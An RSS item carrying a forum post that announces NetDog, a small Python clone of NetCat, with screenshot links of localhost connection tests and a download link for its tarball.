      <description><![CDATA[Here is the first release of NetDog, a light weight version of NetCat. NetDog(or nd) is coded by me, Chroniccommand. If you take a look at the readme, you will see this is not supposed to be used over NetCat. It is merely a light weight solution using Python sockets. <br>Here are some screenshots:<br>NetDog main help screen(no arguments given):<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/Lf1Pm&#46;jpg<br>[/spoiler]<br>Connecting to localhost, port 80<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/jJ3pY&#46;jpg<br>[/spoiler]<br><br>GET / on localhost<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/50AZf&#46;jpg<br>[/spoiler]<br><br>Using UDP on port 80. Of course doesn't work.<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/0vSzx&#46;jpg<br>[/spoiler]<br><br>Port 80 using IPv6, socket timeout as 10 seconds<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/0TWcH&#46;jpg<br>[/spoiler]<br><br>Simple version screen<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/Q4A9q&#46;jpg<br>[/spoiler]<br><br>Listening on port 1337. This is buggy and probably won't work. Good luck :P<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/AuI0U&#46;jpg<br>[/spoiler]<br><br>Closing listening.<br>[spoiler]<br>http&#58;//i&#46;imgur&#46;com/2vLPm&#46;jpg<br>[/spoiler]<br><br>Anyway, here is the tar ball of NetDog:<br><a class="postlink" rel="nofollow" href="http://poisonhack.info/netdog.tar.gz">http://poisonhack.info/netdog.tar.gz</a><br><br>The tarball includes all files needed to run NetDog on a *nix and Windows system. For *nix I've included an install script, which you need to run as root. Then you can just run netdog instead of running the pythong script.<br><br>Enjoy. And please, please read the README.<br>--Chroniccommand]]></description>
   </item>
   </channel>
</rss>